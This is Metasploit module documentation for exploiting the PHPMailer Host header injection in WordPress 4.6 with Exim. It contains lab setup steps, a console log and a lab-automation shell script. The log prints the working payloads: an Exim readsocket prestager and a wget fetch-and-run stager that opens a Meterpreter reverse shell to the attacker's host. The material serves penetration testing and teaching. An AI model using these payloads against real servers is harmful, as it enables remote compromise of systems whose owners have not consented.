## Introduction

This module has some caveats. The target needs a WordPress release around 4.6 (4.6 itself is what the module was tested against) and Exim providing the `sendmail(8)` command: the string injected through the Host header is an Exim string expansion, so a sendmail binary from Postfix or Sendmail proper will not execute it. You do not need to install PHPMailer separately, as WordPress bundles it. Because WordPress backports security fixes into older release branches and a plain install will update itself to a patched 4.6.x minor release, a release tarball is not reliable; use a Git clone and check out the vulnerable tag instead (WordPress also disables automatic core updates when it detects a VCS checkout, so the install stays at the version you checked out).

## Setup

This was tested on Ubuntu 15.04. YMMV.

1. got root?
2. `cd /var/www/html`
3. `git clone https://github.com/WordPress/WordPress wordpress-4.6`
4. `cd wordpress-4.6`
5. `git checkout 4.6`
6. `chown -R www-data:www-data .` (after the checkout, so the files the checkout rewrote are owned by the web server user rather than root)
7. Set up a MySQL database for WordPress
8. Install as normal

## Options

**VERBOSE**

If you'd like to see what requests are being sent, set this to `true`. You should see the Exim prestager commands being sent to the target.

## Usage

```
msf > use exploit/unix/webapp/wp_phpmailer_host_header
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
rhost => 192.168.33.135
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
targeturi => /wordpress-4.6
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf exploit(wp_phpmailer_host_header) > set verbose true
verbose => true
msf exploit(wp_phpmailer_host_header) > run
[*] Started HTTPS reverse handler on https://192.168.33.1:8443
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
[*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/mbpvuuck
[*] Local IP: http://[redacted]:8080/mbpvuuck
[*] Generating and sending Exim prestager
[*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
[+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
[+] Sending payload linux/x64/meterpreter_reverse_https
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
[*] Sending /bin/rm -f /tmp/vfotastd
[*] Server stopped.
meterpreter > 
```

A few things to check if the run stalls after the prestager is sent: the target has to reach the module's HTTP server (`SRVHOST`/`SRVPORT`, port 8080 above) to fetch the stager, it needs `wget` installed, and the stager writes to and executes from `/tmp`, so a `/tmp` mounted `noexec` will break it. The stager command uses `${IFS}` in place of literal spaces; the target's shell expands that to whitespace when it runs the command.
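The setup steps above, automated as an added example with the two preflight checks a tester wants before firing the module: that `sendmail(8)` on the target really is Exim, and that the checked-out tree still bundles a PHPMailer older than 5.2.18 (the first PHPMailer release carrying the fix). This script is not part of the Metasploit module or its documentation. It assumes the DocumentRoot is `/var/www/html`, the web server runs as `www-data`, the MySQL root account can create databases over a local socket without a password, and that `DB_NAME`, `DB_USER` and `DB_PASS` are placeholders you will change. The web installer (step 8) remains a manual step.

```shell
#!/bin/sh
# Added example, not part of the wp_phpmailer_host_header module.  Automates the
# lab setup and adds preflight checks.  Assumptions are marked below.
set -eu

WEBROOT=/var/www/html            # assumed DocumentRoot
WP_DIR=wordpress-4.6
WP_TAG=4.6                       # vulnerable release tag in the WordPress git mirror
DB_NAME=wordpress                # placeholder: change
DB_USER=wpuser                   # placeholder: change
DB_PASS='change-me'              # placeholder: change
PHPMAILER_FIXED=5.2.18           # first PHPMailer release with the fix

# The Host header payload is an Exim string expansion, so the exploit only works
# when sendmail(8) is Exim.  Given the first line printed by `sendmail -bV`,
# return 0 if it is Exim's banner ("Exim version ...").
sendmail_is_exim() {
    case "$1" in
        "Exim version "*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the PHPMailer version bundled in a WordPress tree.  The class file
# declares `public $Version = 'x.y.z';`; argument is the path to that file.
bundled_phpmailer_version() {
    sed -n "s/.*public \$Version *= *'\([0-9.]*\)'.*/\1/p" "$1" | head -n 1
}

# Return 0 when dotted-decimal version $1 is strictly lower than $2.
# Compares numerically per component, so 5.2.9 < 5.2.18 (string compare would not).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= (n > m ? n : m); i++) {
            p = (i <= n) ? x[i] + 0 : 0
            q = (i <= m) ? y[i] + 0 : 0
            if (p < q) exit 0
            if (p > q) exit 1
        }
        exit 1
    }'
}

setup_wordpress() {
    [ "$(id -u)" -eq 0 ] || { echo "got root? run this as root" >&2; return 1; }

    banner=$(sendmail -bV 2>/dev/null | head -n 1 || true)
    sendmail_is_exim "$banner" || { echo "sendmail is not Exim: '$banner'" >&2; return 1; }

    cd "$WEBROOT"
    [ -d "$WP_DIR" ] || git clone https://github.com/WordPress/WordPress "$WP_DIR"
    cd "$WP_DIR"
    git checkout "$WP_TAG"
    chown -R www-data:www-data .          # after checkout, so nothing stays root-owned

    v=$(bundled_phpmailer_version wp-includes/class-phpmailer.php)
    if version_lt "$v" "$PHPMAILER_FIXED"; then
        echo "bundled PHPMailer $v is older than $PHPMAILER_FIXED: vulnerable, good"
    else
        echo "bundled PHPMailer $v already carries the fix; wrong tag checked out?" >&2
        return 1
    fi

    # Step 7: database for the installer.  GRANT ... IDENTIFIED BY is the classic
    # syntax that works on the MySQL 5.x of that era; MySQL 8 needs CREATE USER first.
    mysql -u root <<SQL
CREATE DATABASE IF NOT EXISTS $DB_NAME;
GRANT ALL PRIVILEGES ON $DB_NAME.* TO '$DB_USER'@'localhost' IDENTIFIED BY '$DB_PASS';
FLUSH PRIVILEGES;
SQL
    echo "WordPress $WP_TAG is in $WEBROOT/$WP_DIR; finish the web installer with db=$DB_NAME user=$DB_USER"
}

# Only touch the system when explicitly asked, so the checks can be sourced alone:
#   WP_LAB_SETUP=1 sh wp_lab_setup.sh
if [ "${WP_LAB_SETUP:-0}" = 1 ]; then
    setup_wordpress
fi
```

Run it as `WP_LAB_SETUP=1 sh wp_lab_setup.sh` on the target VM. If the PHPMailer check fails on a fresh clone, the tree was updated past 4.6 (a `4.6.x` tag or a branch head) rather than the `4.6` tag; re-check the checkout before running the module.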